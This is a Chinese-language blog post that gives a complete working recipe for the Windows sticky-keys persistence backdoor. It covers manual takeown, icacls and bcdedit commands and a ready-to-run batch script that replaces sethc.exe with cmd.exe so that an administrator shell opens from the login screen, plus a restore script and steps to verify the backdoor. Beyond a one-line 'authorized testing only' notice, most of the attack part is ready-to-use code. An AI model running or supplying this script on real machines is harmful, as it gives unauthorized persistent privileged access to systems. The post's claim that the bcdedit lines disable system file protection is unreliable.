粘贴键后门

作者:Administrator 发布时间: 2026-01-23 阅读量:7 评论数:0

后门制作原理

  1. sethc.exeWindows 系统核心文件(路径:C:\Windows\System32\sethc.exe),默认绑定 “连续按 5Shift” 触发;

  2. 管理员权限下夺取 sethc.exe 所有权、修改权限,将其替换为 cmd.exe(系统命令提示符程序);

  3. 替换后,登录界面按 5Shift 键不再调出粘滞键设置,而是直接打开管理员权限 CMD,实现权限维持。

后门制作步骤包含高版本 Windows

前提条件

  • 登录 Windows 系统的账户必须属于 Administrators(管理员组);

  • 需以「管理员身份」运行 CMD(突破 UAC 权限过滤)。

  • 或者通过系统漏洞提权到 Administratorssystem

高版本 Windows 关键适配说明(Win7/Win10/Win11

普通管理员账户打开的 CMD 默认为「受限管理员权限」,修改 system32 核心文件会触发两层拦截,需注意:

  1. UAC 权限过滤:必须右键 CMD 选择「以管理员身份运行」(标题栏显示「管理员」),否则会提示 “拒绝访问”;

  2. 系统文件保护(SFC):Windows 会保护 sethc.exe 等核心文件,脚本中通过 bcdedit 临时禁用 SFC(重启后自动恢复),避免替换被拦截;

  3. 权限强化:通过 icacls 命令强制赋予当前用户 sethc.exe 完全控制权限(比 cacls 更适配高版本系统)。

开启sethc 后门

:: 1. 切换到 system32 目录
cd /d C:\Windows\System32
:: 2.临时禁用系统文件保护SFC避免替换文件被拦截
bcdedit /set {current} recoveryenabled no
bcdedit /set {current} bootstatuspolicy ignoreallfailures
:: 3.夺取文件所有权授予管理员组
takeown /F C:\windows\system32\sethc.exe /A
takeown /F C:\windows\system32\cmd.exe /A
:: 4.强制赋予当前用户完全控制权限
icacls C:\Windows\System32\sethc.exe /grant %username%:F /c /t
cacls C:\Windows\System32\cmd.exe /E /G administrators:F
:: 5.备份原始粘滞键程序避免覆盖后无法恢复
move sethc.exe sethc.exe.bak
:: 6.备份原始粘滞键程序避免覆盖后无法恢复
copy cmd.exe sethc.exe /Y

删除sethc 后门

:: 1. 恢复系统文件保护(SFC)
bcdedit /set {current} recoveryenabled yes
bcdedit /set {current} bootstatuspolicy displayallfailures
:: win7恢复
bcdedit /set {current} bootstatuspolicy standard
bcdedit /set {current} bootstatuspolicy default

:: 2. 删除替换后的后门程序
del sethc.exe /F /Q

:: 3. 恢复原始粘滞键程序
ren sethc.exe.bak sethc.exe

:: 4. 重置文件权限(还原默认状态)
icacls C:\Windows\System32\sethc.exe /reset /c /t

一键权限维持脚本(360 会弹窗)

将以下代码保存为 sethc_backdoor.bat右键选择「以管理员身份运行」(关键!普通运行会触发权限拦截):

@echo off
echo ========================================
echo 开始制作粘滞键后门(仅授权测试使用)
echo ========================================

:: 1. 切换到 system32 目录(核心文件所在路径)
cd /d C:\Windows\System32
if %errorlevel% neq 0 (
    echo 错误:无法切换到 system32 目录,请确认路径或权限!
    pause
    exit /b 1
)

:: 2. 临时禁用系统文件保护(SFC),避免拦截核心文件修改(重启后自动恢复)
echo 步骤1:临时禁用系统文件保护(SFC)...
bcdedit /set {current} recoveryenabled no >nul 2>&1
bcdedit /set {current} bootstatuspolicy ignoreallfailures >nul 2>&1

:: 3. 夺取 sethc.exe、cmd.exe 所有权(授予管理员组)
echo 步骤2:夺取文件所有权...
takeown /F C:\windows\system32\sethc.exe /A >nul 2>&1
takeown /F C:\windows\system32\cmd.exe /A >nul 2>&1

:: 4. 强制赋予当前用户 sethc.exe 完全控制权限(突破权限限制)
echo 步骤3:设置文件权限...
icacls C:\Windows\System32\sethc.exe /grant %username%:F /c /t >nul 2>&1
cacls C:\Windows\System32\cmd.exe /E /G administrators:F >nul 2>&1

:: 5. 备份原粘滞键程序,避免覆盖后无法恢复
echo 步骤4:备份原始 sethc.exe...
move sethc.exe sethc.exe.bak >nul 2>&1
if %errorlevel% equ 0 (
    echo 备份成功:sethc.exe → sethc.exe.bak
) else (
    echo 警告:备份失败(可能已存在备份文件),继续执行替换...
)

:: 6. 核心步骤:将 cmd.exe 复制为 sethc.exe,替换粘滞键程序
echo 步骤5:替换粘滞键程序为 cmd.exe...
copy cmd.exe sethc.exe /Y >nul 2>&1
if %errorlevel% equ 0 (
    echo ========================================
    echo 粘滞键后门制作成功!
    echo 验证方法:锁定系统(Win+L),登录界面连续按5次Shift键,会调出管理员CMD
    echo ========================================
) else (
    echo 错误:替换失败!请确认:
    echo 1. 脚本以「管理员身份」运行;
    echo 2. 系统未开启第三方防护软件拦截;
    pause
    exit /b 1
)

pause
exit /b 0

一键恢复脚本(360 会弹窗)

将以下代码保存为 sethc_restore.bat右键选择「以管理员身份运行」

@echo off
echo ========================================
echo 开始恢复系统默认粘滞键设置(含所有权还原)
echo ========================================

:: 1. 切换到 system32 目录
cd /d C:\Windows\System32
if %errorlevel% neq 0 (
    echo 错误:无法切换到 system32 目录!
    pause
    exit /b 1
)

:: 2. 恢复系统文件保护(SFC)
echo 步骤1:恢复系统文件保护...
bcdedit /set {current} recoveryenabled yes >nul 2>&1
bcdedit /set {current} bootstatuspolicy standard >nul 2>&1
bcdedit /set {current} bootstatuspolicy displayallfailures >nul 2>&1
bcdedit /set {current} bootstatuspolicy default >nul 2>&1
:: 3. 删除后门程序
echo 步骤2:删除后门程序...
del sethc.exe /F /Q >nul 2>&1

:: 4. 恢复原始粘滞键程序
echo 步骤3:恢复原始 sethc.exe...
ren sethc.exe.bak sethc.exe >nul 2>&1
if %errorlevel% equ 0 (
    echo 原始粘滞键程序恢复成功!
) else (
    echo 警告:未找到备份文件(sethc.exe.bak),可能已手动删除!
)

:: 5. 重置文件权限 + 恢复原始所有权(关键:覆盖 takeown 操作)
echo 步骤4:还原文件默认权限和所有权...
icacls C:\Windows\System32\sethc.exe /reset /c /t >nul 2>&1
icacls C:\Windows\System32\sethc.exe /setowner "NT SERVICE\TrustedInstaller" /c /t >nul 2>&1
icacls C:\Windows\System32\cmd.exe /reset /c /t >nul 2>&1

echo ========================================
echo 系统恢复完成!
echo ========================================

pause
exit /b 0

验证方法

后门生效验证

  1. 按下 Win+L 锁定系统,进入登录界面;

  2. 连续按 5Shift 键,若调出黑色 CMD 窗口(而非粘滞键设置),说明后门制作成功;

  3. CMD 窗口默认是管理员权限,可执行 whoami 验证权限(显示 administrator 或管理员组账户)。

恢复成功验证

  1. 执行恢复脚本后,锁定系统并连续按 5Shift 键;

  2. 若弹出「粘滞键设置」窗口(而非 CMD),说明系统恢复正常。

下一篇:泛微OA E-Cology jqu...

评论